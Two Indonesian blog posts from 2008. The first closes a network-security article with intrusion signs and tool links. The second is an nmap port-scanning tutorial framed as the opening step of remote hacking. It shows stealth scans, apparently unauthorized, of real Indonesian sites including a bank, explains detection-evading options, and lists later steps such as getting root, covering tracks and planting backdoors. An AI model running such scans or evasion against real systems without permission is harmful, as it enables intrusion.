Langkah lain yang bisa kita lakukan adalah mencari dan mendapatkan software-software khusus yang berhubungan dengan masalah sekuriti. Contohnya antara lain: COPS (software penganalisa kelemahan dalam password dan konfigurasi file), SATAN (software penganalisa jarak jauh terhadap usaha-usaha penyusupan dari luar), TCP-Wrapper (software yang bertugas mencatat beberapa aktivitas transfer data),  Tripwire (mirip dengan TCP-Wrapper), dlsb. Dengan adanya software ini, kita bisa mengetahui hingga seberapa tinggi tingkat sekuriti sistem jaringan komputer kita.

Penanggulangan
Jika  terjadi usaha-usaha penyusupan ke dalam sistem jaringan komputer, kita harus secepat mungkin menutup akses dari mana usaha-usaha penyusupan tersebut. Beberapa ciri-ciri dasar dari usaha-usaha penyusupan adalah usaha login yang gagal terus-menerus, sumber daya komputer yang terserap habis akibat satu atau lebih layanan networking, munculnya file-file aneh yang asal-usulnya tidak diketahui, jebolnya password dari beberapa user, dlsb. Bila penyusup telah berhasil memasuki sistem komputer kita dan bisa memperoleh hak akses setara root, bisa dipastikan sistem komputer kita sudah tidak aman. Mengapa? Karena pada umumnya penyusup telah membuat backdoor yang cukup aman dan tersembunyi kecuali kita mengetahui setiap titik dari backdoor yang dibuat oleh penyusup tersebut dan kita bisa memusnahkannya. Bila kita tidak bisa menemukan backdoor tersebut, jalan teraman adalah instalasi ulang sistem operasi yang ada di komputer tersebut .

Sebagai system administrator yang baik, kita seharusnya selalu membaca log file yang banyak dihasilkan oleh program-program yang dieksekusi di komputer kita. Dengan membaca log file ini, kejadian-kejadian yang tidak diinginkan dapat dideteksi lebih dini.

Akhir kata, “tiada gading yang tak retak”. Kita harus selalu waspada dengan kesalahan-kesalahan yang mungkin kita perbuat baik dengan sengaja maupun tidak yang baik secara langsung ataupun tidak langsung dapat mengancam sekuriti sistem jaringan komputer kita. Kita juga harus selalu meningkatkan tingkat keterampilan dan keahlian kita karena usaha-usaha eksplorasi yang dilakukan oleh para hacker, cracker, dan phreaker selalu lebih maju.

Daftar Sumber-sumber Dokumen dan Situs-situs di Internet yang berkaitan dengan masalah sekuriti di Internet

Dokumen:
•    Computer Security Basics, Deborah Russell & G.T. Gangemi Sr., © 1991 O’Reilly & Associates, Inc.
•    Pratical Unix Security, Simon Garfinkel & Gene Spafford, © 1991 O’Reilly & Associates, Inc.
•    Unix System Security: A Guide for Users and System Administrators, David A. Curry, © 1992 Addison-Wesley Professional Computing Series
•    Firewalls and Internet Security, William R. Cheswick & Steven M. Bellovin, © 1994 AT&T Bell Laboratories, Addison-Wesley Publishing Company
•    Building Internet Firewalls, Brent Chapman and Elizabeth Zwicky, © 1995 O’Reilly & Associates, Inc.
•    Pretty Good Privacy, Simon Garfinkel, © 1995 O’Reilly & Associates, Inc.
•    Dokumen berikut dapat diperoleh melalui ftp.ds.internic.net di direktori /rfc/ :
•    RFC 931, Authentication Server, Michael St. Johns.
•    RFC 1244, Site Security Handbook, J. Paul Holbrook & Joyce K. Reynolds.
•    RFC 1281, Guidelines for the Secure Operation of the Internet, Richard D. Pethia & Stephen D. Crocker.
•    RFC 1508, Generic Security Service Application Program Interface, John Linn.
•    RFC 1750, Randomness Recommendations for Security, Donald E. Eastlake 3rd & Stephen D. Crocker.
•    RFC 1825, Security Architecture for the Internet Protocol, Randall Atkinson.
•    RFC 1826, IP Authentication Header, Randall Atkinson.
•    RFC 1827, IP Encapsulating Security Payload (ESP), Randall Atkinson.
•    RFC 2015, MIME Security with Pretty Good Privacy (PGP), Michael Elkins.
•    Beberapa dokumen yang terletak di ftp.cs.purdue.edu pada direktori /pub/spaf/ssecurity/ yang dapat diambil melalui anonymous ftp.
•    Orange Book & Red Book, part of The Rainbow Books, DoD Computer Security Center. Kedua dokumen tersebut terdapat di ftp.cert.org pada direktori /pub/info/orange-book.Z dan /pub/info/red-book.Z.

Software:
Crack, ftp://ftp.auscert.org.au/pub/cert/tools/crack/*
COPS, ftp://ftp.auscert.org.au/pub/cert/tools/cops/1.04
PGP, ftp://ftp.ifi.uio.no/pub/pgp/
SATAN, ftp://ftp.win.tue.nl/pub/security/satan*
Tiger, ftp://net.tamu.edu/pub/security/TAMU/tiger-2.2.3.tar.gz
TCP-Wrapper, ftp://ftp.win.tue.nl/pub/security/tcp_wrappers_7.6.tar.gz
Tripwire, ftp://ftp.auscert.org.au/pub/coast/COAST/Tripwire/*

September 8, 2008 Posted by | Tutorial tentang IT | Leave a comment

Port Scanning untuk Melihat Kondisi Target di Internet

Dalam melakukan hacking jarak jauh (remote), langkah paling awal yang harus dilakukan sebelum proses hacking dilakukan adalah melihat servis yang diberikan oleh server / target di Internet. Dalam konsep jaringan komputer klien-server, setiap program / servis akan menempati sebuah port dalam tatanan protokol TCP (Transmission Control Protocol). Sebagai gambaran kombinasi port-program/servis yang cukup familiar dengan pengguna umum Internet adalah:

25    smtp server
80    web server
110    pop server

Cara paling sederhana untuk melihat status servis pada server target di Internet adalah menggunakan software port scanner seperti nmap di Linux yang dibuat oleh fyodor@insecure.org.

Nmap di rancang untuk memungkinkan seorang sistem administrator atau perorangan yang iseng untuk melakukan scan jaringan yang besar, melihat mesin yang sedang beroperasi & servis yang mereka berikan. Cukup banyak teknik scan yang diberikan oleh nmap seperti  UDP, TCP connect(), TCP SYN (half open), ftp proxy (bounce attack), Reverse-ident, ICMP (ping sweep), FIN, ACK sweep, Xmas  Tree,  SYN sweep, dan Null scan. Di samping itu, nmap juga memberikan banyak fitur seperti remote OS detection via TCP/IP fingerprinting,  stealth  scanning,  kalkulasi dynamic   delay   &       retransmission, parallel scanning, detection of down hosts via parallel  pings,  decoy  scanning,  port filtering detection, direct (non-portmapper) RPC scanning,      fragmentation scanning, dan spesifikasi yang flexible dari target & port.

Saya kebetulan menggunakan Linux Mandrake 8.0 di komputer Pentium 133MHz di rumah. Linux Mandrake 8.0 menyediakan nmap dalam distribusinya. Port scanner nmap dapat digunakan menggunakan command line (di ketik di promt $ atau #) atau menggunakan grafik interface di Linux. Saya sendiri lebih suka menggunakan command line, karena kita dapat mengontrol lebih banyak parameter.

Cuplikan contoh hasil port scan tiga (3) situs Indonesia di Internet, yaitu:

http://www.detik.com
http://www.telkom.co.id
ibank.klikbca.com

[root@gate onno]# nmap -v -sS -O http://www.detik.com

Starting nmap V. 2.53 by fyodor@insecure.org ( http://www.insecure.org/nmap/ )
Host http://www.detik.com (202.158.66.181) appears to be up … good.
Initiating SYN half-open stealth scan against http://www.detik.com
Interesting ports on http://www.detik.com (202.158.66.181):
(The 1513 ports scanned but not shown below are in state: filtered)
Port       State       Service
20/tcp     closed      ftp-data
21/tcp     closed      ftp
22/tcp     open        ssh
25/tcp     closed      smtp
80/tcp     open        http
110/tcp    closed      pop-3
443/tcp    closed      https
1417/tcp   closed      timbuktu-srv1
5900/tcp   closed      vnc
5901/tcp   closed      vnc-1

TCP Sequence Prediction: Class=random positive increments
Difficulty=3193299 (Good luck!)

Nmap run completed — 1 IP address (1 host up) scanned in 580 seconds

[root@gate onno]# nmap -v -sS -O http://www.telkom.co.id

Starting nmap V. 2.53 by fyodor@insecure.org ( http://www.insecure.org/nmap/ )
Host  (202.134.2.15) appears to be up … good.
Interesting ports on  (202.134.2.15):
(The 1493 ports scanned but not shown below are in state: closed)
Port       State       Service
7/tcp      open        echo
9/tcp      open        discard
13/tcp     open        daytime
19/tcp     open        chargen
37/tcp     open        time
80/tcp     open        http
111/tcp    open        sunrpc
137/tcp    filtered    netbios-ns
138/tcp    filtered    netbios-dgm
139/tcp    filtered    netbios-ssn
199/tcp    open        smux
512/tcp    open        exec
513/tcp    open        login
514/tcp    open        shell
543/tcp    open        klogin
544/tcp    open        kshell
882/tcp    open        unknown
883/tcp    open        unknown
1234/tcp   open        hotline
1352/tcp   open        lotusnotes
1524/tcp   filtered    ingreslock
2041/tcp   filtered    interbase
2401/tcp   open        cvspserver
6000/tcp   filtered    X11
6112/tcp   open        dtspc
12345/tcp  filtered    NetBus
12346/tcp  filtered    NetBus
27665/tcp  filtered    Trinoo_Master
32771/tcp  open        sometimes-rpc5
32773/tcp  open        sometimes-rpc9

TCP Sequence Prediction: Class=truly random
Difficulty=9999999 (Good luck!)

Nmap run completed — 1 IP address (1 host up) scanned in 284 seconds
[root@gate onno]#

[root@yc1dav onno]# nmap -vv -sS -O ibank.klikbca.com

Starting nmap V. 2.53 by fyodor@insecure.org ( http://www.insecure.org/nmap/ )
Host  (202.158.15.52) appears to be down, skipping it.
Note: Host seems down. If it is really up, but blocking our ping probes, try -P0
Nmap run completed — 1 IP address (0 hosts up) scanned in 43 seconds

Tampak diantara ke tiga (3) situs di atas, ibank.klikbca.com merupakan situs yang palings serius pertahanannya. Bahkan oleh nmap yang melakukan stealth probe gagal untuk melihat port yang aktif di ibank.klikbca.com (sebetulnya port 443 terbuka di ibank.klikbca.com).

http://www.telkom.co.id merupakan situs yang termasuk paling parah pertahanannya, demikian banyak port yang terbuka di Internet sehingga membuat kita berfikir apakah betul ini Telkom yang hebat itu? Koq sampai demikian ceroboh? Atau di sengaja? Entahlah.

http://www.detik.com cukup baik hanya membuka penuh port 80 (Web) dan 22 (SSH); di samping ada beberapa port lain yang beroperasi tapi tertutup bagi umum di Internet untuk mengakses-nya.

Cara menjalankan nmap juga tampak relatif sederhana, menggunakan format

# nmap [tipe scan] [option] nama-target-mesin

Jika PC anda tersambung ke Internet, maka port scanning akan dijalankan secara otomatis oleh nmap & menampilkan hasil seperti tampak di atas.

Ada beberapa tipe scan yang sering digunakan untuk melihat port nama saja yang terbuka dari ribuan port; beberapa perintah yang ada seperti, -sT, -sF, -sR dsb. Yang sering saya gunakan adalah:

-sS – TCP SYN scan: teknik ini kadang di sebut “half-open” scanning, karena anda tidak membuka penuh hubungan TCP. Jika di responds dengan SYN|ACK maka port berarti terbuka. Bila responds berupa RST menunjukan servis tidak jalan. Pada saat SYN|ACK di terima, nmap akan meresponds dengan RST. Dengan teknik ini, sedikit situs yang akan mencatat scanning yang dilakukan. Hal ini di sebut stealth scannning.

Ada banyak option yang mengatur cara kerja nmap, beberapa yang sering saya gunakan misalnya:

-P0 – tidak melakukan ping ke target, untuk menghindari kita terlihat oleh target.

-f  – menggunakan potongan paket kecil-kecil (fragmented) agar sulit di deteksi oleh software pendeteksi penyusup.

-v – verbose mode, untuk melihat hasil antara proses scan pada layar.

-O – mencoba menebak sistem operasi yang digunakan oleh mesin target.

Untuk melihat penjelasan lengkap berbagai pilihan yang ada di nmap, ada baiknya membaca manual nmap yang dapat diperoleh dengan men-tik

$ man nmap

di prompt Linux.

Setelah kita mengetahui port / servis yang dijalankan di mesin target, kita perlu mengetahui jenis software untuk servis tersebut. Dan mencoba membaca-baca di situs underground kelemahan software tersebut, sukur-sukur kalau kita menemukan eksploit software tersebut. Biasanya eksploit yang tersedia perlu di compile menggunakan compiler C.

Perlu di ingat & di pahami proses hacking akan terdiri dari empat (4) langkah utama yaitu:

Step 1: Memperoleh akses ke situs.
Step 2: Menghack root.
Step 3: Menutupi bekas-bekas anda.
Step 4: Membuat backdoor untuk menjaga account.

Kita baru mencapai Step 0, usaha untuk membuka akses ke situs. Perjalanan masih lama & membutuhkan banyak waktu & proses belajar.

September 8, 2008 Posted by | Tutorial tentang IT | Leave a comment